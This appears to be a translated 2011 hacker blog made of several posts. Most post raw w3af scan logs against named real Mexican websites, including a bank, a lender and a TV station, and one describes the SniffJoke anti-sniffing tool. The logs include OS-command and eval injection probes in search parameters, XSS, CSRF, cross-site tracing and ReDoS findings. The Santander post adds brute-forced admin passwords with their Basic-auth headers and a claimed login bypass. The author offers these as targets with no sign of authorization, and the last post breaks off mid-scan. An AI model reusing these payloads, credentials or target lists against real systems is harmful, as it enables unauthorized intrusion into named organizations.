Monday, May 30, 2011

Script at http://www.tv3puebla.com/esmas/

Greetings, Free World.

Here is a vulnerability at http://www.tv3puebla.com/esmas/

http://www.tv3puebla.com/esmas/

[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: grep.error500
[Mon 30 May 2011 11:50:53 AM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.getMails
[Mon 30 May 2011 11:50:54 AM CDT] Auto-enabling plugin: grep.lang
[Mon 30 May 2011 11:51:02 AM CDT] The page language is: es
[Mon 30 May 2011 11:51:03 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:52:53 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" has the following DAV methods enabled:
[Mon 30 May 2011 11:52:53 AM CDT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[Mon 30 May 2011 11:52:53 AM CDT] Starting formAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Starting basicAuthBrute plugin execution.
[Mon 30 May 2011 11:52:53 AM CDT] Found 2 URLs and 2 different points of injection.
[Mon 30 May 2011 11:52:53 AM CDT] The list of URLs is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/
[Mon 30 May 2011 11:52:53 AM CDT] The list of fuzzable requests is:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas | Method: GET | Parameters: (s="Buscar...")
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas/ | Method: GET
[Mon 30 May 2011 11:52:53 AM CDT] The web application sent a persistent cookie.
[Mon 30 May 2011 11:52:53 AM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 30 May 2011 11:52:53 AM CDT] - http://www.tv3puebla.com/esmas
[Mon 30 May 2011 11:53:15 AM CDT] The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.
[Mon 30 May 2011 11:53:15 AM CDT] The server header for the remote web server is: "Apache/2.2.3 (Red Hat)". This information was found in the request with id 83.
[Mon 30 May 2011 11:53:15 AM CDT] The URL "http://www.tv3puebla.com/esmas/" has the following allowed methods, which include DAV methods: *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL.
[Mon 30 May 2011 11:53:15 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent the cookie: "bb2_screener_=1306774395+189.131.40.162; path=/esmas/". This information was found in the request with id 138.
[Mon 30 May 2011 11:53:33 AM CDT] A possible ReDoS was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21". . Please review manually. This information was found in the request with id 206.
[Mon 30 May 2011 11:54:40 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:54:43 AM CDT] A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.
[Mon 30 May 2011 11:55:18 AM CDT] eval() input injection was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=sleep(9)%3B". . Please review manually. This information was found in the request with id 330.
[Mon 30 May 2011 11:55:45 AM CDT] The "getMails" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Mon 30 May 2011 11:55:54 AM CDT] Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.
[Mon 30 May 2011 11:55:54 AM CDT] The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.
[Mon 30 May 2011 11:57:03 AM CDT] Password profiling TOP 100:
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774453+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774590+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] The URL: "http://www.tv3puebla.com/esmas/" sent these cookies:
[Mon 30 May 2011 11:57:03 AM CDT] - bb2_screener_=1306774294+189.131.40.162; path=/esmas/
[Mon 30 May 2011 11:57:03 AM CDT] Finished scanning process.


xsrf:get_xsrf Cross site request forgery vulnerability

The URL: http://www.tv3puebla.com/esmas is vulnerable to cross site request forgery.

osCommanding: Possible OS commanding vulnerability

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=ping+-c+9+localhost".Please review manually. This information was found in the request with id 227.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%26%26/usr/sbin/ping+-s+localhost+1000+10+".Please review manually. This information was found in the request with id 237.

A possible OS Commanding was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=%7Cping+-n+3+localhost".Please review manually. This information was found in the request with id 241.

xss:xss: Cross site scripting vulnerability

Cross Site Scripting was found at: "http://www.tv3puebla.com/esmas", using HTTP method GET. The sent data was: "s=". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 371.

xst:xst:Cross site tracing vulnerability.

The web server at "http://www.tv3puebla.com/esmas/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 393.



There you have it. Greetings, Free World.

Sniffjoke

Greetings, Free World.

What is SniffJoke?

An Internet client running SniffJoke injects into the transmission flow some packets that can seriously disturb passive analysis such as sniffing, interception and low-level information theft. No server support is needed!

Why is this possible?
Internet protocols were developed to let two parties communicate, not to let a third party intercept their communication. Interception does happen, but the communication system was not developed with that goal.
SniffJoke uses the network protocol in a permitted way, exploiting the implicit difference between the network stack of a real operating system and the dissector of a sniffer.
Why was it developed?

Because many people believe that the only way to obtain security is through control. I do not want to tell them they are wrong, but controlling the Internet is impossible if people do not want to be controlled. Obviously you should not rely on a security control that can be bypassed, should you?
Once you understand this, remember that the progressive acceptance of control measures has been treated as a "necessary sacrifice". When you realize that this security method does not restore security but only makes abuse possible, you will be ready to stop accepting this useless sacrifice.

What SniffJoke does not protect against

If you are using an untrusted third party (Facebook), it does not matter how much your data is encrypted, encoded or whatever: the data is in Facebook's store, unprotected and filed. If you use a trojaned box it is the same: it is like having an invisible, weightless observer sitting on your lap, transcribing everything you do. SniffJoke protects against: a sniffer on the network, a sniffer on the provider's stream, a sniffer on the destination network.

Security and social goals

SniffJoke achieves several goals. Information security will not be control-based, at least not on passive traffic and data analysis, because Internet technology was not designed with this capability. Wiretapping is not used only by law enforcement (which has plenty of other technologies at its disposal); passive wiretapping technology has become widespread and usable by any entity, not for your security but for the value derived from your data.

Setting up your first location
See "why is a location required?" If you are going to use some kind of default,
use the command line:

sniffjoke-autotest -l nam -d /usr/local/var/sniffjoke -n 1


sniffjoke-autotest will run a series of tests using different configurations and will generate the files sniffjoke requires; sniffjoke-autotest is a script (which in turn requires another script, sj-iptcp-sonda).

sniffjoke --location nam --foreground --debug 6


This will start sniffjoke: check whether it is working, or whether something needs to be fixed in the configuration file.

sniffjokectl stat
sniffjokectl start


The first command shows the status, the second makes sniffjoke start; start, stop and debug are other commands that sniffjokectl can perform, acting as a client.

Errors, warnings, problems


Autotest: autotest sometimes exits reporting a network malfunction.


Malformations: using the "wrong" scramble in plugins-enabled.conf, even one generated by sniffjoke-autotest, will in fact cause some misbehaviour. This is because I do not have a Windows server with pe.php at my disposal; if anyone can support this test, please contact the team!


It can be downloaded from its website at: http://www.delirandom.net/sniffjoke/sniffjoke-howto-usage/

Translation: Dellcom1@

Greetings, Free World.

Friday, May 27, 2011

Cross Site Tracing see.sbi.com.mx/invernet2000/Login.jsp

Greetings, Free World.

Here is another one for you to study.

https://see.sbi.com.mx/invernet2000/Login.jsp

[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:02:04 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:02:05 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:02:09 PM CDT] The page language is: es
[Thu 26 May 2011 10:02:10 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:11 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:02:11 PM CDT] Found 1 URLs and 1 different points of injection.
[Thu 26 May 2011 10:02:11 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp
[Thu 26 May 2011 10:02:11 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:02:11 PM CDT] - https://see.sbi.com.mx/invernet2000/Login.jsp | Method: GET
[Thu 26 May 2011 10:02:11 PM CDT] The web application sent a persistent cookie.
[Thu 26 May 2011 10:02:11 PM CDT] This is the information about the SSL certificate used in the target site:
- Digest (SHA-1): F1:D9:65:32:E0:B3:92:49:1F:F8:82:4C:0C:83:1D:F7:6D:40:47:E6
- Digest (MD5): 1E:39:62:29:82:A3:A6:61:A6:BA:E1:23:87:FB:97:68
- Serial#: 52710929251855116405284257897386420621
- Version: 2
- Expired: No
- Subject:
- Issuer:
- PKey bits: 1024
- PKey type: RSA (6)
- Certificate dump:

[Thu 26 May 2011 10:02:12 PM CDT] The server header for the remote web server is: "IBM_HTTP_SERVER/1.3.19.6-PQ90262 Apache/1.3.20 (Unix)". This information was found in the request with id 15.
[Thu 26 May 2011 10:02:12 PM CDT] The URL "https://see.sbi.com.mx/invernet2000/" has the following allowed methods: GET, HEAD, OPTIONS, POST, TRACE. This information was found in the request with id 17.
[Thu 26 May 2011 10:02:12 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent the cookie: "JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/". This information was found in the request with id 1.
[Thu 26 May 2011 10:03:26 PM CDT] Too many retries (2) while requesting: https://see.sbi.com.mx/invernet2000/
[Thu 26 May 2011 10:03:28 PM CDT] The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40.
[Thu 26 May 2011 10:03:30 PM CDT] The URL: "https://see.sbi.com.mx/invernet2000/Login.jsp" sent these cookies:
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3; Path=/
[Thu 26 May 2011 10:03:30 PM CDT] - JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;Path=/
[Thu 26 May 2011 10:03:30 PM CDT] Finished scanning process.


xst=xst

The web server at "https://see.sbi.com.mx/invernet2000/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 40


TRACE https://see.sbi.com.mx/invernet2000/ HTTP/1.1
Host: see.sbi.com.mx
Cookie: Path=/; JSESSIONID=0000WCFTTRJH2LFYEEHTNL30B1Y:114mahff3;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net


Greetings, Free World.

Thursday, May 26, 2011

Santander Vulnerable

Greetings, Free World.

Here is another one.

[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:05:46 PM CDT] The page language is: es
[Thu 26 May 2011 10:05:46 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:05:47 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication. The realm is: "Basic realm="Sun ONE Web Server"". This information was found in the request with id 53.
[Thu 26 May 2011 10:05:56 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basic authentication bruteforce on URL: "http://www.santander.com.mx/NuevaVersion/".
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 102.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 104.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 105.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 107.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 108.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 106.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 110.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 109.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 111.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 112.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 113.
[Thu 26 May 2011 10:06:00 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.
[Thu 26 May 2011 10:06:00 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:06:00 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] Found 2 URLs and 3 different points of injection.
[Thu 26 May 2011 10:06:00 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:00 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/ | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: POST | Parameters: (miURL="/schmexapp...", pag="/schmexapp...", login.claveCliente="", login.NIP="", irAmodulo="1")
[Thu 26 May 2011 10:06:30 PM CDT] Too many retries (2) while requesting: http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:43 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Thu 26 May 2011 10:07:16 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:07:16 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:07:16 PM CDT] The URL "http://www.santander.com.mx/NuevaVersion/" has the following allowed methods: GET, HEAD, POST.
[Thu 26 May 2011 10:07:17 PM CDT] The thread: raised an exception while running the request: bound method localFileInclude._sendMutant of >

basicAuthBrute auth

Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.

GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)


htaccessMethods=auth

The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.


I leave these here for you to study.

Greetings, Free World.

Provident vulnerable to ReDoS

Greetings, Free World.

Here is another website vulnerable to ReDoS, as well as to xrfs:get_xsrf and xst: xst.
This is a company that lends money, aimed at housewives.
Scan:


http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ



[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.collectCookies

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.httpAuthDetect

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.error500

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.serverHeader

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.allowedMethods

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.frontpage_version

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.passwordProfiling

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.getMails

[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.lang

[Thu 26 May 2011 12:08:19 PM EDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:24 PM EDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.

[Thu 26 May 2011 12:08:38 PM EDT] The page language is: es

[Thu 26 May 2011 12:08:39 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:08:46 PM EDT] Starting formAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Starting basicAuthBrute plugin execution.

[Thu 26 May 2011 12:08:46 PM EDT] Found 3 URLs and 5 different points of injection.

[Thu 26 May 2011 12:08:46 PM EDT] The list of URLs is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:46 PM EDT] The list of fuzzable requests is:

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1 | Method: GET | Parameters: (gclid="CJD-8bTDhq...")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="10000")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="3900")

[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search | Method: GET | Parameters: (q="")

[Thu 26 May 2011 12:08:56 PM EDT] The web application sent a persistent cookie.

[Thu 26 May 2011 12:08:56 PM EDT] The following scripts are vulnerable to a trivial form of XSRF:

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/search is vulnerable to cross site request forgery.

[Thu 26 May 2011 12:10:02 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.

[Thu 26 May 2011 12:10:02 PM EDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 to 20.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/campaign_lp_v1" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 1.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 21.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 22.

[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/search" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 32.

[Thu 26 May 2011 12:11:02 PM EDT] A possible ReDoS was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=11111111111111111111111111111111199%21". . Please review manually. This information was found in the request with id 239.

[Thu 26 May 2011 12:11:02 PM EDT] ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.

[Thu 26 May 2011 12:13:22 PM EDT] A possible OS Commanding was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=%26%26ping+-c+9+localhost".Please review manually. This information was found in the request with id 327.

[Thu 26 May 2011 12:14:35 PM EDT] eval() input injection was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 569.

[Thu 26 May 2011 12:16:06 PM EDT] The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.

[Thu 26 May 2011 12:19:00 PM EDT] Password profiling TOP 100:


[Thu 26 May 2011 12:19:00 PM EDT] The cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/" was sent by these URLs:

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/ZEPQu.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/search

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/EEfFv

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_bin/_vti_aut/author.dll

[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_inf.html

[Thu 26 May 2011 12:19:00 PM EDT] Finished scanning process.



redos: ReDoS vulnerability.



ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.



GET http://www.provident.com.mx/pages/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21 HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net



xrfs:get_xsrf



The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.



xst: xst



The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.



TRACE http://www.provident.com.mx/pages/?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net





Information link: http://en.wikipedia.org/wiki/ReDoS

I leave these with you.

Greetings, Free World.

Wednesday, 25 May 2011

Iniciativa Mexico vulnerable

Greetings, Free World.

Iniciativa Mexico vulnerable

http://www.iniciativamexico.org

[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.collectCookies
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Wed 25 May 2011 03:26:54 PM CDT] Auto-enabling plugin: grep.error500
